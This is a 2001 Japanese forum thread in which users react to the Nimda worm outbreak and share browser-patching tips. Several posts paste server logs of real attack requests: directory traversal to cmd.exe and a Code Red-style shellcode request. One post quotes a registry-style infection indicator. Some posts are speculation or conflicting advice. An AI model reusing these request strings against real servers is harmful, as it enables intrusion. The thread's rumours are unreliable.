1 :
MSN :
01/09/19 10:08 ID:mxUXkeNs
2 :
2 :01/09/19 10:10 ID:.z6DCC0s
2
3 :
:01/09/19 10:11 ID:WLemDI/2
>>1へ お疲れ!! ありがとう!!
4 :
:01/09/19 10:11 ID:HVDfRYR.
バージョンは5.5だけどSP1とかSP2とかはどこに載ってるの?
5 :
:01/09/19 10:10 ID:EWJVz4Oc
2?
坂東玉三郎カミングアウト!
8 :
(゚Д゚)「ゲプーッ!」 :01/09/19 10:12 ID:mCICu5N6
>>1 5.5SP2でもI・E6、どっちでもいいんですかい?
9 :
:01/09/19 10:12 ID:CIjuhvgQ
10 :
Win98 :01/09/19 10:12 ID:Ubxngo7E
アップデートのページ、まっちろなんだけど。。。 オイラだけ???
11 :
:01/09/19 10:12 ID:XgqTfaVQ
早めにアップデートしとかないと やがて激重になるかな?
12 :
:01/09/19 10:13 ID:xbjhX50U
前スレチゲーし 藁 はじめて見たよ、前スレちがうの
13 :
1 :01/09/19 10:13 ID:mxUXkeNs
MSIE5.5 SP2 IE6 どっちでも良い MSIE5.5SP2は確認されているがIE6はおれが踏んで実験したからヨシ。 ちゃんと警告デタヨ。
14 :
:01/09/19 10:13 ID:V2f5utYw
>>1 おつかれさま。
つーか、ソース忘れてるぞ(w
>>8 前スレの情報では、どっちもOK。
ちゃんと「ダウンロードしますか?」ダイアログが出る。
16 :
:01/09/19 10:13 ID:0hSV8Kps
ネスケでJavaオフじゃダメなん?
17 :
1 :01/09/19 10:14 ID:mxUXkeNs
前スレ違う! 自分でもワロタ
18 :
:01/09/19 10:15 ID:H1sqALwQ
ウイルス配ってアップデートさせるなんてすごい発想だね。 さすがMS。
19 :
:01/09/19 10:15 ID:qSOu2Upo
>>16 別にダウソロード&実行しなきゃOKよ。
IE5.01、5.5のSP2以前だと、セキュリティーホールつかれて、
自動実行されちゃうからまずいってことらしく。
ついでに、JavaとJavaScriptは別もん。
20 :
名無しさん@お腹いっぱい :01/09/19 10:16 ID:iUSdnviQ
Win95だとIE6は使えないよね?
21 :
:01/09/19 10:16 ID:1L5pANOU
IEユーザは ツール→インターネットオプション→セキュリティ →レベルのカスタマイズ→JAVAと付くもの全てのラジオを不許可クリック →ダウンロードのファイルのダウンロードのラジオクリック →OK→適用→OK で、まだ感染していなければ防げるはず……だよな?(不安なら書くな俺よ)
22 :
:01/09/19 10:16 ID:0hSV8Kps
23 :
:01/09/19 10:16 ID:I3qXI7NI
インストールされたらどんな被害が出るの?
24 :
:01/09/19 10:16 ID:V2f5utYw
前スレ間違えちゃダメだろ(w
25 :
:01/09/19 10:17 ID:TH3yhgJE
試しにhttpd立ち上げてしばらく待ってみたんだけど。 これってワームがやってんのかな。 [19/Sep/2001:10:13:55 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 134 [19/Sep/2001:10:13:56 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 134 [19/Sep/2001:10:13:57 +0900] "GET /msadc/..%5c../..%5c../..%5c/..チ../..チ../..チ../winnt/system32/cmd.exe HTTP/1.0" 404 134 [19/Sep/2001:10:14:05 +0900] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 134 [19/Sep/2001:10:14:09 +0900] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 134 [19/Sep/2001:10:14:10 +0900] "GET /scripts/..チ../winnt/system32/cmd.exe HTTP/1.0" 404 134 [19/Sep/2001:10:14:14 +0900] "GET /sc?/c+dir HTTP/1.0" 404 134 [19/Sep/2001:10:14:20 +0900] "GET /scripts/..?../winnt/system32/cmd.exe HTTP/1.0" 404 134 [19/Sep/2001:10:14:27 +0900] "GET /scripts/..?../winnt/system32/cmd.exe HTTP/1.0" 404 134 [19/Sep/2001:10:14:30 +0900] "GET /scripts/..・c../winnt/system32/cmd.exe HTTP/1.0" 400 109 [19/Sep/2001:10:14:39 +0900] "GET /scripts/..・c../winnt/system32/cmd.exe HTTP/1.0" 400 109
26 :
:01/09/19 10:17 ID:qSOu2Upo
27 :
:01/09/19 10:18 ID:CN87eRgs
28 :
:01/09/19 10:18 ID:CIjuhvgQ
どういう経緯で玉三郎になったのだろう・・・・(w
29 :
1 :01/09/19 10:18 ID:mxUXkeNs
緊迫感が台無しです。 正直悪かった。正直狙ってない。
30 :
前スレの942 :01/09/19 10:18 ID:OO3wQbOI
今回のは、既発のパッチが完璧に当たった、IISサーバにも感染するの?
31 :
初心者 :01/09/19 10:18 ID:L7DiAsK.
ノートンいれてるんですが、それだけじゃだめですかね
32 :
名無しさん :01/09/19 10:20 ID:qM9fx6jM
33 :
:01/09/19 10:20 ID:75TmM8/w
■緊急セキュリティ情報■ WEBを見るだけで感染するウイルス(Windows向け)が 昨夜(9/18)からネット上で自己増殖しております。 詳細な情報などは2chの関知するところではありませんが 現在判っている限りではインターネットエクスプローラーSP2に バージョンをあげる事によって「見ただけで感染」は防げるようです。 Windowsユーザーは各自可及的速やかにWindowsUpdateを行ない その後もWEBから不審なプログラムをダウンロードしない事を強くお勧めいたします。
34 :
名無し :01/09/19 10:20 ID:r9Obg67M
36 :
:01/09/19 10:20 ID:ruuRkgsY
http://help.msn.co.jp/notice.htm より
平素より MSN をご利用いただき、まことにありがとうございます。
9 月 18 日夜 11 時ころ、MSN のサーバーが新種のワームによる被害をこうむりました。
また、これにともない、昨晩同時刻以降 MSN のサーバーをご覧になったお客様のコンピュータに、
このワームによる被害がもたらされた可能性があります。 MSN では事態の緊急性に鑑み、
問題が明らかになった後ただちにサーバーをインターネットから遮断する処置をとりましたが、
それ以前の時間帯に MSN をご覧になったお客様につきましては、下記の症状が現れたものと
思われます。
ページを表示する段階で、ある種のファイルをダウンロードするように
求められる。 ページを表示する段階で、ある種のファイルを自動的にダウンロードして実行し
、結果としてハードディスク内に大量のファイルを生成する。
いずれの症状が出たかは、お客様がお使いのブラウザのバージョンによって異なります。
また、1.のケースでファイルをダウンロードして実行した場合、結果として2.と同じ
症状がご利用のコンピュータに発生します。またこれ以外の症状が現れた可能性もありますが、
現時点では確実な情報ではありません。
以下のバージョンのブラウザをご利用の方は、2.の症状が現れた可能性があります。
Internet Explorer 5.01 または Internet Explorer 5.01 SP1
Internet Explorer 5.5 または Internet Explorer 5.5 SP1
それ以外のブラウザをご利用の方は1.の症状が現れたか、または影響
を受けていません。
37 :
:01/09/19 10:21 ID:usJFfbdQ
sp2、DLできんぞ! アクセス集中しまくってんのか? MS氏ね!!!!!!!!!!!!!
38 :
:01/09/19 10:21 ID:1L5pANOU
>>23 ワームが分身を増やそうとWEBコンテンツを見る度にウイルスパケットを
サーバにぶち込む。
バックドアがクライアントを筒抜けにする。
訳わからんファイルが量産され、HDD容量とメモリを食いつぶす。
他あったらフォローよろ
39 :
MSN :01/09/19 10:21 ID:FFteR93Y
MSNが自分のところに修正パッチを当ててなかったってことか? なんじゃそりゃ
40 :
:01/09/19 10:21 ID:BCdauIbY
米軍がやっとんとちゃうか?
41 :
:01/09/19 10:21 ID:usJFfbdQ
こわくて2ch以外のサイトいけないぞ!!
42 :
1 :01/09/19 10:22 ID:mxUXkeNs
罪滅ぼし: サーバー側のワームは現在の所サービスパック及びパッチを当てても 感染するという情報も有り、まだ確認は取れず。 クライアント側はMSIE5.5SP2 MSIE6でダウンロードウインドウが 出るようになる。 それ以前のMSIEはMSNいわく影響はないらしいが2chでは5.00でも感染したという報告。
43 :
すでに :01/09/19 10:22 ID:wVtcNB2E
WindowsUpdate激重。 IE5.5SP2の標準ダウンロードで3〜4時間以上はかかりそうです。
44 :
:01/09/19 10:22 ID:vgeUQdF2
MSNの自作自演に1票。
45 :
読め! :01/09/19 10:22 ID:4o/feuXU
46 :
名無しさん :01/09/19 10:23 ID:qM9fx6jM
Unicode Derectory Traversal?しっかりしろよzdnet
47 :
ナナシサン :01/09/19 10:23 ID:ETHVTTR2
サイバーテロリストの犯行だ! 核攻撃を食らわせろ!!!
48 :
:01/09/19 10:24 ID:BCdauIbY
戦争のために通信規制しているんだろ。 米国の自作自演だろ。
49 :
:01/09/19 10:24 ID:1vjJkxgU
ドーナツR使ってて、JAVAその他切ってたら、関係ないの?
50 :
:01/09/19 10:24 ID:qSOu2Upo
>>41 セキュリティーホール塞いでないIEで、とりあえず巡回したいときは
JavaScript切っておけばよいかと思われ。
51 :
仕様書無しさん :01/09/19 10:24 ID:iaQQZmng
52 :
ホントの前スレ :01/09/19 10:25 ID:u5rP1leA
53 :
1 :01/09/19 10:25 ID:mxUXkeNs
54 :
マァヴ ★ :01/09/19 10:25 ID:???
55 :
:01/09/19 10:25 ID:BCdauIbY
56 :
:01/09/19 10:26 ID:HVDfRYR.
MS最低だんだ(´ー`)
57 :
クレクレ君 :01/09/19 10:26 ID:OxvYKjJE
マウント富士のサイトでload.exeをゲットしたよ。 今。同居中。
58 :
素人 :01/09/19 10:26 ID:gH9heGvQ
アップデートすれば問題無いんでしょうか・・・???
59 :
マァヴ ★ :01/09/19 10:26 ID:???
文字化けするし(^_^;)
60 :
:01/09/19 10:26 ID:X4AWx6uY
61 :
:01/09/19 10:26 ID:qSOu2Upo
>>49 DonutRの設定で言えば「スクリプトの実行」をOffに。
62 :
25 :01/09/19 10:27 ID:TH3yhgJE
>>32 そうなんだ。うちADSLなんだけどああいうアタックが1時間で50位来る。何故だ。
こんなのも来た。
[19/Sep/2001:10:04:04 +0900] "GET /default.ida?
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u
6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078
%u0000%u00=a HTTP/1.0" 404 134
63 :
名無しさん :01/09/19 10:26 ID:qM9fx6jM
>>49 クライアントはjs切ってりゃ問題ない。
サーバたててんならcoderedで出てきたパッチあてれ
64 :
名無し :01/09/19 10:26 ID:r9Obg67M
マイクロャtト社には藁た。
65 :
:01/09/19 10:27 ID:CIjuhvgQ
そうか、アクセス集中で落とせないのか・・・・(;´Д`)
66 :
名無しさん :01/09/19 10:27 ID:xd.89Pkw
Microsoftの積極的な協力のおかげで、Symantecはウハウハですな(´ー`)y−〜〜
>>51 ゴメン。SP2まで当たってる前提で書いてたっす。
68 :
:01/09/19 10:27 ID:BceX/Byw
マイコンピュータ内でreadme.exe MEP51B3.TMP.EXE .eml検索して 出てこなかったら大丈夫なんだよね?
70 :
読め :01/09/19 10:29 ID:4o/feuXU
■新種ウイルス「Nimda」の感染拡大=米司法長官■
http://headlines.yahoo.co.jp/hl?a=20010919-00000116-jij-bus_all 【シリコンバレー18日時事】「Nimda(ニムダ)」と呼ばれる
危険度の高い新種のコンピューターウイルスが登場し、ウイルス対策会社
などが注意を呼び掛けている。
米国では同時テロが発生した直後だけに、インターネットを利用した
サイバーテロの活発化が懸念されていたが、アシュクロフト司法長官は
18日「現時点で(ウイルスと)テロとの関連を示す証拠はない」としている。
米ウイルス対策大手シマンテックによると、同ウイルスは、電子メールで
届けられる添付ファイル「readme.exe」に潜み、これを利用者が
不用意に開くことで感染する。
感染したコンピューターは、ウイルスメールを外部に発信。
マイクロソフト製ウェブサーバーソフトを利用している他のコンピューター
に対して同ソフトのセキュリティーホール(欠陥)を狙った攻撃を仕掛ける。
(時事通信)[9月19日9時3分更新]
>>68 念のためウイルスチェックしといたほうがよい。
もちろん最新のパターンファイルでな。
72 :
名無し :01/09/19 10:30 ID:r9Obg67M
The firewall has blocked Internet access to your computer (TCP Port 111) from 211.17.238.51 (TCP Port 4415) [TCP Flags: S]. The firewall has blocked Internet access to your computer (TCP Port 111) from 202.64.58.100 (TCP Port 4691) [TCP Flags: S]. The firewall has blocked Internet access to your computer (TCP Port 111) from 202.8.231.244 (TCP Port 1604) [TCP Flags: S]. The firewall has blocked Internet access to your computer (TCP Port 6635) from 62.23.105.1 (TCP Port 6635) [TCP Flags: SF]. 何これ?アタック来たよ
73 :
:01/09/19 10:31 ID:qSOu2Upo
マイクロソフトの体張った啓蒙活動、かな・・・ かなりいい迷惑だけど。 つーか、PC初心者が多く見てるであろうmsnのサーバがまっさきに感染したのがイタい。
74 :
:01/09/19 10:31 ID:BceX/Byw
で、感染したとして、ファイルが共有になってたり、メールを大量送付してた場合、 自分でわかるの?
75 :
:01/09/19 10:31 ID:T.hgQQdI
NetScapeでヨカッタ かちゅ〜しゃもエンジンはIEなので普段IE使わない俺も アップデートする必要があるのか?
76 :
名無し :01/09/19 10:32 ID:r9Obg67M
The firewall has blocked Internet access to your computer (TCP Port 8000) from news.2ch.net (216.218.213.162) (TCP Port 4111) [TCP Flags: S] The firewall has blocked Internet access to your computer (TCP Port 81) from news.2ch.net (216.218.213.162) (TCP Port 4126) [TCP Flags: S]. 2ちゃんからアタック来た。
77 :
49 :01/09/19 10:33 ID:1vjJkxgU
>61、>63 ありがとうございます。
>>73 しかもIEデフォルトの設定だとmsnがホームページに設定されてるからなぁ・・
>>72 それはsunrpcのセキュリティホールをつつくUNIX用のワーム。
あっちはあっちでちゃんとセキュリティ対策してないと引っかかるよ。
IISだとsunrpc自体機能が存在しないので引っかからない。
79 :
:01/09/19 10:33 ID:0hSV8Kps
80 :
:01/09/19 10:33 ID:WBf583Ys
http://headlines.yahoo.co.jp/hl?a=20010919-00000001-vgb-sci 複合的な攻撃、感染機能をもつウィルス Nimda
昨日、22時ごろから国内のwebサーバへの攻撃、新種ウィルスの増殖が急激にひろがった。
これらの一連の被害は、Nimda と呼ばれるウィルスのしわざによるものと思われる。
Nimda は、感染すると、インターネット上のサーバに対して、攻撃を行う。攻撃は既知の
複数セキュリティホールをターゲットとして行われる。サーバへの攻撃に成功すると、
サーバ上のwebページを改竄し、受動的攻撃を行うスクリプトを埋め込む。
このスクリプトを埋め込まれたページを利用者が表示すると、適切な防御措置
(パッチをあててある、スクリプトの実行機能をオフにしているなど)「見ただけで」
感染してしまう。感染した利用者のパソコンは、さらにサーバへの攻撃を行うとともに、
ウィルスを添付した大量のメールを配信する。
こうした一連の複合的な攻撃手法をもった凶悪なウィルスの登場により、
web改竄などの被害が急激に拡大している。
なお、ワームに関しては、certですでに部分的な情報が掲載されている他、
アンチウィルス数社に情報が掲載されている。
[ヤフーニュース9月19日9時59分]
81 :
:01/09/19 10:35 ID:cd9RQlRQ
今回はシマンテックの勝利。トレンドマイクロ出遅れたな
>>76 それは2ちゃんねるに記事を投稿するときに不正串が上がってないかどうかを
チェックするためのモノだ。
83 :
ナナシさん :01/09/19 10:35 ID:RKFwf2b2
Windows2000SP2に同梱されてるIE5.01SP2使ってるんだけどコレは大丈夫? それとも逝ってよしですか?
84 :
:01/09/19 10:36 ID:cUwoT4o6
IE5.5sp2がおとせん あと2時間かかる・・
85 :
名無し :01/09/19 10:35 ID:r9Obg67M
The firewall has blocked Internet access to your computer (TCP Port 8000) from ton.2ch.net (64.71.133.114) (TCP Port 3893) [TCP Flags: S]. The firewall has blocked Internet access to your computer (TCP Port 81) from ton.2ch.net (64.71.133.114) (TCP Port 3894) [TCP Flags: S]. The firewall has blocked Internet access to your computer (TCP Port 8081) from ton.2ch.net (64.71.133.114) (TCP Port 3895) [TCP Flags: S]. The firewall has blocked Internet access to your computer (TCP Port 9081) from ton.2ch.net (64.71.133.114) (TCP Port 3896) [TCP Flags: S]. もう最悪。ゾヌが警告で2ちゃんから30件のアタック
86 :
72? :01/09/19 10:36 ID:OtlH8lsE
ラディンの仕業ですか? マイクロソフト=アメリカってこと?
87 :
nanasisan :01/09/19 10:36 ID:KSWVQD0E
>>83 もちろん被害の対象になる。ちゃんとアップデートすべし。
88 :
:01/09/19 10:37 ID:CN87eRgs
正直、msnって行ったことないんだけどそんなに便利なの?
89 :
:01/09/19 10:37 ID:BceX/Byw
>>71 最新でも駄目なんじゃない?もう更新されてるの?
90 :
:01/09/19 10:37 ID:qSOu2Upo
>>87 ん?5.01SP2は大丈夫じゃなかったっけ?
91 :
:01/09/19 10:38 ID:cd9RQlRQ
2chのサーバもやられちゃったの?
92 :
:01/09/19 10:39 ID:uy8Pfu/w
93 :
:01/09/19 10:39 ID:HVDfRYR.
94 :
87? :01/09/19 10:39 ID:OtlH8lsE
オレ、アナログなので、大変っす! 普段はテレホタイムにしかやらないんだけど、 今日は風邪で休んだから、 この時間にネットをしていたら、 なんかウィルスらしいじゃないっすか! ふぅ…。 ラディンに違いない!ムカツク!
95 :
ナナシサン :01/09/19 10:39 ID:ETHVTTR2
>715 別にベストエフォートじゃなくてもいいからさ 512kbpsとか1Mbpsにしてくれねぇかな それぐらいしてくれても罰は当たらんと思うがね
96 :
95? :01/09/19 10:40 ID:OtlH8lsE
IE6日本語版っていつになったら出るの?
97 :
:01/09/19 10:40 ID:CIjuhvgQ
俺もmsnなんて、ほとんど使った事は無い。 たまにアドレスバーから直に検索するぐらいだ。
98 :
最悪。。。 :01/09/19 10:40 ID:wVtcNB2E
Internet Explorer およびインターネット ツールのインストール中にほかのダウンロード サイトへの接続を試みましたが、ネットワークの問題のため接続できませんでした。早朝、深夜など、比較的空いている時間にもう一度セットアップ プログラムを実行してみてください。 また、インターネット サービス プロバイダ側に問題がある可能性もあります。 再びインターネットに接続できたら、[はい、セットアップを再開します] をクリックして、前回のセットアップの続きを実行してください。
99 :
:01/09/19 10:40 ID:1L5pANOU
ウイルス対応の速さを謳っていたMcAFEEは全く反応してないなぁ。 ウイルス名検索すらHITしないわ(藁
100 :
:01/09/19 10:41 ID:cd9RQlRQ
>>94 漏れはケーブラーだから数分で済んだよ ヘヘッ
101 :
:01/09/19 10:41 ID:rUiXeQag
大変だ!IEのパッチにもウイルスが! アップデートするな! NESCAPEつかえ!
102 :
:01/09/19 10:41 ID:qM9fx6jM
http://help.msn.co.jp/notice.htmより引用 。
>また、昨晩の時点ですでに影響を受けていると思われるケースについては、
>該当するコンピュータをインターネットの環境から切り離し、
>追って提供されると思われる各ウィルス対策ソフトの最新ウィルス定義ファイルを入手後、
>コンピュータ内をスキャンして問題のあるファイルを駆除することをお勧めします。
インターネットに接続しちゃいけないのに
ウィルス定義ファイルを入手しなければいけないらしい。
これは難題だ。
103 :
:01/09/19 10:42 ID:2CYBgGgA
ウインドウズアップデートに逝ったら、 アクティブXを許可するようセキュリティレベルを変更しろという 警告が出てアップデート画面に逝けなかった。 危なそうだから切ってるのになぁ。これじゃ対策できないよ。
104 :
:01/09/19 10:42 ID:bi15wNtM
5.50.4134〜〜なんだけどSP1とか2っていうのは どこを見ればわかるのでしょうか? 教えてください。
105 :
:01/09/19 10:42 ID:WBf583Ys
これは、みんなのアドレスを回収してるんだろ。 米軍の作戦に強力しろよ。
106 :
質問 :01/09/19 10:43 ID:zI4sYv0Y
PC初心者だからなにがおこっているのか、 どう対策したらいいのかわからない。 ウィルスバスターはいれてある。 IE5.0 SP2 って書いてあります。これで大丈夫なんですか? 感染するとどうなるんですか? あとマイクロソフトのソフト更新ページ行こうとすると なにかダウンロードする状態になるのですが、まさかマイクロソフトページ がハッキンぐされてないでしょうね?
107 :
:01/09/19 10:43 ID:OtlH8lsE
>>101 NESCAPE ある意味ウィルスじゃん。
108 :
:01/09/19 10:43 ID:qM9fx6jM
>>92 ページは書き換えられない。
クライアントからのリクエストによって出力の最後に追加する形らしい。
だからサーバにあるhtmlファイルを見ても感染してるかどうかはわからない。
109 :
:01/09/19 10:43 ID:CIjuhvgQ
110 :
:01/09/19 10:44 ID:mxUXkeNs
111 :
:01/09/19 10:44 ID:FuOd4MA6
オレ5.00で感染してないんだけど
112 :
:01/09/19 10:45 ID:cd9RQlRQ
>>103 ヴァーカ 信頼するサイトに登録しとけばイイんだ
>>104 だいぶ古いバージョンらしい すぐアップデートしろ
113 :
:01/09/19 10:45 ID:LNEMDmj.
前スレの873ですが、なんとかSP2にUPDATEできたようです。 バージョン情報のところにSP2とあればいいんですよね? 前スレの875,876さん、ありがとうございました。
114 :
:01/09/19 10:45 ID:3JZD3Vno
コード・レッド上回る感染力の新ウイルス、FBIが警告 米連邦捜査局(FBI)は18日、極めて感染力が強い新種のコンピューター・ウイルス 「W32NIMDA」が広まりつつあるとして注意を呼び掛けた。 7月にインターネットの情報の流れを滞らせ、ホワイトハウスのサーバーを攻撃した 「コード・レッド」よりも広範囲に被害をもたらす可能性があるという。 ウイルスは「Admin(政府)2(to)3W(War)」、つまり 「第三次世界大戦へ向かう政府」という意味のことばを逆に書いたような名称。 このため、先週の同時テロとの関係を指摘する声もあるが、 アシュクロフト司法長官は記者会見で、「ウイルス感染と同時テロとを結びつける証拠は 現時点では得ていない」と述べた。 ウイルスは昨日から電子メールの添付ファイルとともに急速に広がり出し、 サーバーやパソコンへの感染は数万件に達している模様だ。 「README.EXE」の名前が付いた電子メールのファイルを開いて感染した例が 報告されている。(ワシントン=安藤淳)
115 :
:01/09/19 10:45 ID:FFqQ1V3w
早速対策を…と思ったらインストール途中で必ず止まりやんの鬱 アンインストールも出来ないし前にも進めず後ろも戻れず
116 :
:01/09/19 10:46 ID:NlvHTnzs
117 :
k :01/09/19 10:47 ID:TPMz4Xgk
118 :
. :01/09/19 10:47 ID:/fS/CQEE
ビンラディンまんせー
119 :
ガシシ右松 :01/09/19 10:48 ID:gBj1L9VM
5.5SP2なんですけど、 ダウンロード確認ダイアログ出たもんで キャンセルしてすぐ切断。 ファイル見てみたらホントに出来てた・・・ readme.exeとreadme.eml !! すぐ削除したけど、 それにしても感染速度のレコード塗り替えるんじゃないか?
120 :
Win厨房のあほのみなさん :01/09/19 10:48 ID:rUiXeQag
IE5.5SP2がダウンロードできない人は、近くのコンピュータ店にいって、 プロバイダが販促用に配ってるCDをもらってくるとよい。もちろん無料。 だいたいはIEの最新版が入ってるはず。場合によってはプロバイダ用に カスタマイズ(トップページがmsnでない等)されてる場合もあるが、 とりあえずバージョンアップするには良いと思う。
122 :
:01/09/19 10:49 ID:1L5pANOU
>>104 更新バージョンという項目に、
sp1;XXXXXXXXX(数は重要じゃないからパス)
ってな風になっているならSP1(危険らしい)
sp2;xxxxxxxx
ならSP2(安全らしい)
どちらもなければノーマルバージョン(危険)
>>119 IEが感染に荷担しているという意味でCodeRedより被害は拡大しそうだ。
124 :
豆 :01/09/19 10:50 ID:K7bK1LgQ
アドレス帳に誰のアドレスも無いのですが(悲 それでも感染していた場合、他人迷惑かける事はあるでしょうか。 昨日、夕方以降はmsnにはアクセスしていませんです。
125 :
:01/09/19 10:50 ID:mxUXkeNs
126 :
:01/09/19 10:51 ID:lX8DO7fQ
どんなスクリプトだったらウィルスなんですか? 前スレの1以外に変化したりするんですか?
127 :
名無しさん :01/09/19 10:51 ID:xd.89Pkw
∧_∧ / ̄ ̄ ̄ ̄ ̄ ( ´_ゝ`)< ふーん ( ) \_____ | | | (__)_)
129 :
:01/09/19 10:51 ID:usJFfbdQ
あーくそめっちゃむかつく!!!!! 絶対感染しとるわ!!!!!!
130 :
:01/09/19 10:51 ID:CIjuhvgQ
>>119 IEのTemporary Internet Filesにreadme.emlが残ってるかもね。
131 :
:01/09/19 10:52 ID:p0HcAdmo
なんかすごそうだがよくわからない 簡潔に言うとIE5.5 SP2をウィンドウズアップデート行って入れればいいわけ?
>>131 そーです。
あと、WindowsUpdateにインストールしてないパッチがあれば、
それらも一緒に入れておいた方がよい。
133 :
:01/09/19 10:53 ID:1L5pANOU
げ、既に感染している手遅れがwinアップデートにウイルス撒いてしまった らしいってICQ来たけど、マジ?
134 :
:01/09/19 10:53 ID:qSOu2Upo
135 :
(゚д゚) :01/09/19 10:54 ID:9EWYmhQQ
検索したらemlファイルが2個・・・ 場所はメール関連・・・ 最後にメーラー起動したのはNYテロ以前・・・・ 結構前から発生してたかも。
136 :
ななし :01/09/19 10:54 ID:gTujLaVg
今メールチェックしたら 自分のやってるMLあてに「MAILER DAEMON@mama.〜」なるメールが来てて、 WEBメールで添付ファイル開いたらダウンロードページが出てきました 会員以外からのメールだったんでみんなに配布される前に削除したんですが これってやっぱやばいでしょうか?
137 :
:01/09/19 10:54 ID:p0HcAdmo
138 :
:01/09/19 10:53 ID:ruuRkgsY
139 :
名無し :01/09/19 10:54 ID:r9Obg67M
PC再起動できなくて、あぼーんなんて事に。
140 :
:01/09/19 10:54 ID:75TmM8/w
みんなウィルスにかかって馬鹿だね〜 彼女でも作りな! 俺なんてかわいこちゃんとメールごっこしてるよ〜 花火の出るメールおくって貰ってもうラブラブ! 向こうもHAPPY1999っていうから幸せそうだよ!
141 :
:01/09/19 10:55 ID:cd9RQlRQ
142 :
名無しさん :01/09/19 10:55 ID:t5ePDc5w
>>125 IE6は素人でも入れて良いってことになったのか?
144 :
ナナシサン :01/09/19 10:55 ID:ETHVTTR2
>133 最高の展開になるかもしれませんね(w
145 :
:01/09/19 10:55 ID:lX8DO7fQ
おいらマカで今日ヒマだから 感染サイト探してきたいんだけど 手がかりをください。
146 :
:01/09/19 10:56 ID:r.Jpc6gY
OCNつながんないんだけどなんか関係あるのかな。 常時接続がつながらないから非常に困る。 つーか、初心者の俺は的外れなこと言ってるかも。
147 :
:01/09/19 10:56 ID:NlvHTnzs
>>142 公式サイトなんだから間違いない
SP1が出るまで待つのか?
148 :
:01/09/19 10:56 ID:p0HcAdmo
149 :
ナナシサソ :01/09/19 10:57 ID:uy8Pfu/w
150 :
:01/09/19 10:57 ID:cd9RQlRQ
とりあえず感染サイト一覧キボーーーン
151 :
:01/09/19 10:57 ID:H/4ljnnI
IE6入れてもいいの?
152 :
ナナシサソ :01/09/19 10:58 ID:uy8Pfu/w
153 :
:01/09/19 10:58 ID:7id9qeMg
IE6だから関係ねーや
154 :
:01/09/19 10:59 ID:qSOu2Upo
155 :
:01/09/19 10:59 ID:9N7NeOAQ
IE6はIE6でセキュリティーホールありそうだから5.5sp2のままにしてるんやけどなぁ。
156 :
シコ踏み :01/09/19 10:59 ID:qasMGDqo
、、、前スレが、玉三郎なんですが(藁
157 :
:01/09/19 10:59 ID:CIjuhvgQ
>>150 ZAでも入れてあれば自然に集まる。ヽ(´ー`)ノ
158 :
:01/09/19 10:59 ID:KkiM3mB2
ts
159 :
:01/09/19 11:00 ID:rUiXeQag
Windows厨房のみなさん。 それでもIEをつかいつづけますか? あほですな。あははは
160 :
:01/09/19 11:01 ID:cd9RQlRQ
161 :
:01/09/19 11:01 ID:qSOu2Upo
つーか、普通にアップデートしときゃ平気なものなんだが。
162 :
名無しさん :01/09/19 11:01 ID:t5ePDc5w
163 :
104 :01/09/19 11:01 ID:bi15wNtM
ノーマルバージョンでした。 危険だ。。。 助言ありがとございます>くれた方 感染してるかどうか調べてみます。
164 :
:01/09/19 11:01 ID:qM9fx6jM
165 :
:01/09/19 11:01 ID:FbuD5hAI
>88 ぜんぜん
166 :
:01/09/19 11:03 ID:NlvHTnzs
167 :
:01/09/19 11:03 ID:KbV6D4iw
初心者はBeta版のIE6.0は入れないほうがいいと思われ!! メモリオーバーになっても対処できなければ違う意味で すすめれない。
168 :
:01/09/19 11:03 ID:1L5pANOU
とりあえず加速度的に感染サイトは増えるはずだから、状況がよくわからん人は インターネットオプションのセキュリティからレベルカスタマイズで javascriptはずしとき〜
169 :
:01/09/19 11:05 ID:n5wmWdo2
バージョン情報で更新バージョンが0って事はメチャメチャ危険てこと!!!?
170 :
ぷ :01/09/19 11:05 ID:VwgsGDI2
PC業界も景気が落ち込んでいる中で、セキュリティ関係は景気がうなぎのぼりらしい ですからねえ。 不景気な世の中でそれを持続させるためにも、ウィルスだのワームだのが必要悪だと 思ったりする輩もいるんだと思いますよ。
171 :
:01/09/19 11:05 ID:XDNpbKcY
JavaScript切るだけでは不十分だと。
172 :
名無しさん :01/09/19 11:06 ID:t5ePDc5w
>>166 >>155 さんみたいな意見もあるし・・・どうすべきか・・・
とりあえず5.5sp2にはしといたんだけどね。
173 :
:01/09/19 11:06 ID:n9gK8NgM
ここ1週間はメール来てない(涙
174 :
104 :01/09/19 11:06 ID:bi15wNtM
自分が感染してるかわからないのですが・・
175 :
:01/09/19 11:06 ID:qSOu2Upo
とりあえず、これで暫くの間ネット重くなったりするんだろなー やだな。
>>169 更新バージョンじゃなくてVersion:ってほうを見れ。
177 :
:01/09/19 11:07 ID:usJFfbdQ
おわびとしてXPを無料配布しろ!!ヽ(`Д´)ノ
178 :
104 :01/09/19 11:08 ID:bi15wNtM
179 :
:01/09/19 11:08 ID:1L5pANOU
>>169 つうか、今回のウイルスに限らず、セキュリティの脆弱さから改善を重ねた物が
SP2だから、いろんな意味で危ないぞ……。
今ネットでアップデートするのは危険だから、まだ感染してなければ
CDROM付きPC雑誌買ってきて、早急に5.5SP2か6.0正式版入れたほうがいい
180 :
113 :01/09/19 11:08 ID:LNEMDmj.
どなたか詳しい方、初心者でもわかるように、対象者や対処法などを 一度まとめてください。過去ログ見ろなんて言わないで・・・。
>>178 でなくて、5.5.xxxx.xxxxとか、6.0.xxxx.xxxxとか書かれているところだ。
182 :
:01/09/19 11:09 ID:f7q1PQcc
system.iniが Shell= explorer.exe load.exe -dontrunold となっていなければ感染していないと考えていいのかな?
183 :
:01/09/19 11:10 ID:cTIFc4g.
184 :
:01/09/19 11:10 ID:qM9fx6jM
185 :
169 :01/09/19 11:10 ID:n5wmWdo2
バージョンにSP2はもちろんSP1すら付いてない!! とりあえずjavaって項目を全てoffにしといたけど時既に遅し!!?
186 :
